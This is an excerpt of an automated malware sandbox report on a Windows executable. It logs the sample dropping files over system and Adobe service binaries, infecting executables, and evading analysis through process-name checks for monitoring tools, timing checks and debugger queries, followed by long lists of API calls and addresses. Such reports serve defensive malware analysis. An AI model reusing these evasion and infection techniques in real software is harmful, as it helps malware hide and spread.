          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B0CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00B0CBD0
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeAPI/Special instruction interceptor: Address: C30C84
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062868407.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000BA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXERG
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347096E rdtsc 3_2_0347096E
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeDropped PE file which has not been started: C:\Windows\System32\AppVClient.exeJump to dropped file
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-111725
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeAPI coverage: 4.9 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exe TID: 892Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 6156Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062897697.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeAPI call chain: ExitProcess graph end nodegraph_0-109613
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeAPI call chain: ExitProcess graph end nodegraph_0-109271
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347096E rdtsc 3_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417D33 LdrLoadDll,3_2_00417D33
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AE1130 mov eax, dword ptr fs:[00000030h]0_2_00AE1130
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B23F3D mov eax, dword ptr fs:[00000030h]0_2_00B23F3D
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00C2F8C0 mov eax, dword ptr fs:[00000030h]0_2_00C2F8C0
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00C30EF0 mov eax, dword ptr fs:[00000030h]0_2_00C30EF0
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00C30F50 mov eax, dword ptr fs:[00000030h]0_2_00C30F50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B2349 mov eax, dword ptr fs:[00000030h]3_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]3_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]3_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]3_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov ecx, dword ptr fs:[00000030h]3_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]3_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]3_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FA352 mov eax, dword ptr fs:[00000030h]3_2_034FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D8350 mov ecx, dword ptr fs:[00000030h]3_2_034D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0350634F mov eax, dword ptr fs:[00000030h]3_2_0350634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D437C mov eax, dword ptr fs:[00000030h]3_2_034D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A30B mov eax, dword ptr fs:[00000030h]3_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A30B mov eax, dword ptr fs:[00000030h]3_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A30B mov eax, dword ptr fs:[00000030h]3_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342C310 mov ecx, dword ptr fs:[00000030h]3_2_0342C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03450310 mov ecx, dword ptr fs:[00000030h]3_2_03450310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03508324 mov eax, dword ptr fs:[00000030h]3_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03508324 mov ecx, dword ptr fs:[00000030h]3_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03508324 mov eax, dword ptr fs:[00000030h]3_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03508324 mov eax, dword ptr fs:[00000030h]3_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EC3CD mov eax, dword ptr fs:[00000030h]3_2_034EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]3_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]3_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]3_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]3_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B63C0 mov eax, dword ptr fs:[00000030h]3_2_034B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE3DB mov eax, dword ptr fs:[00000030h]3_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE3DB mov eax, dword ptr fs:[00000030h]3_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE3DB mov ecx, dword ptr fs:[00000030h]3_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE3DB mov eax, dword ptr fs:[00000030h]3_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D43D4 mov eax, dword ptr fs:[00000030h]3_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D43D4 mov eax, dword ptr fs:[00000030h]3_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E3F0 mov eax, dword ptr fs:[00000030h]3_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E3F0 mov eax, dword ptr fs:[00000030h]3_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E3F0 mov eax, dword ptr fs:[00000030h]3_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034663FF mov eax, dword ptr fs:[00000030h]3_2_034663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E388 mov eax, dword ptr fs:[00000030h]3_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E388 mov eax, dword ptr fs:[00000030h]3_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E388 mov eax, dword ptr fs:[00000030h]3_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345438F mov eax, dword ptr fs:[00000030h]3_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345438F mov eax, dword ptr fs:[00000030h]3_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428397 mov eax, dword ptr fs:[00000030h]3_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428397 mov eax, dword ptr fs:[00000030h]3_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428397 mov eax, dword ptr fs:[00000030h]3_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B8243 mov eax, dword ptr fs:[00000030h]3_2_034B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B8243 mov ecx, dword ptr fs:[00000030h]3_2_034B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0350625D mov eax, dword ptr fs:[00000030h]3_2_0350625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A250 mov eax, dword ptr fs:[00000030h]3_2_0342A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436259 mov eax, dword ptr fs:[00000030h]3_2_03436259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EA250 mov eax, dword ptr fs:[00000030h]3_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EA250 mov eax, dword ptr fs:[00000030h]3_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434260 mov eax, dword ptr fs:[00000030h]3_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434260 mov eax, dword ptr fs:[00000030h]3_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434260 mov eax, dword ptr fs:[00000030h]3_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342826B mov eax, dword ptr fs:[00000030h]3_2_0342826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342823B mov eax, dword ptr fs:[00000030h]3_2_0342823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]3_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]3_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]3_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]3_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]3_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_035062D6 mov eax, dword ptr fs:[00000030h]3_2_035062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034402E1 mov eax, dword ptr fs:[00000030h]3_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034402E1 mov eax, dword ptr fs:[00000030h]3_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034402E1 mov eax, dword ptr fs:[00000030h]3_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E284 mov eax, dword ptr fs:[00000030h]3_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E284 mov eax, dword ptr fs:[00000030h]3_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B0283 mov eax, dword ptr fs:[00000030h]3_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B0283 mov eax, dword ptr fs:[00000030h]3_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B0283 mov eax, dword ptr fs:[00000030h]3_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034402A0 mov eax, dword ptr fs:[00000030h]3_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034402A0 mov eax, dword ptr fs:[00000030h]3_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov ecx, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]3_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]3_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C4144 mov ecx, dword ptr fs:[00000030h]3_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]3_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]3_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342C156 mov eax, dword ptr fs:[00000030h]3_2_0342C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C8158 mov eax, dword ptr fs:[00000030h]3_2_034C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436154 mov eax, dword ptr fs:[00000030h]3_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436154 mov eax, dword ptr fs:[00000030h]3_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504164 mov eax, dword ptr fs:[00000030h]3_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504164 mov eax, dword ptr fs:[00000030h]3_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DA118 mov ecx, dword ptr fs:[00000030h]3_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DA118 mov eax, dword ptr fs:[00000030h]3_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DA118 mov eax, dword ptr fs:[00000030h]3_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DA118 mov eax, dword ptr fs:[00000030h]3_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F0115 mov eax, dword ptr fs:[00000030h]3_2_034F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03460124 mov eax, dword ptr fs:[00000030h]3_2_03460124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F61C3 mov eax, dword ptr fs:[00000030h]3_2_034F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F61C3 mov eax, dword ptr fs:[00000030h]3_2_034F61C3
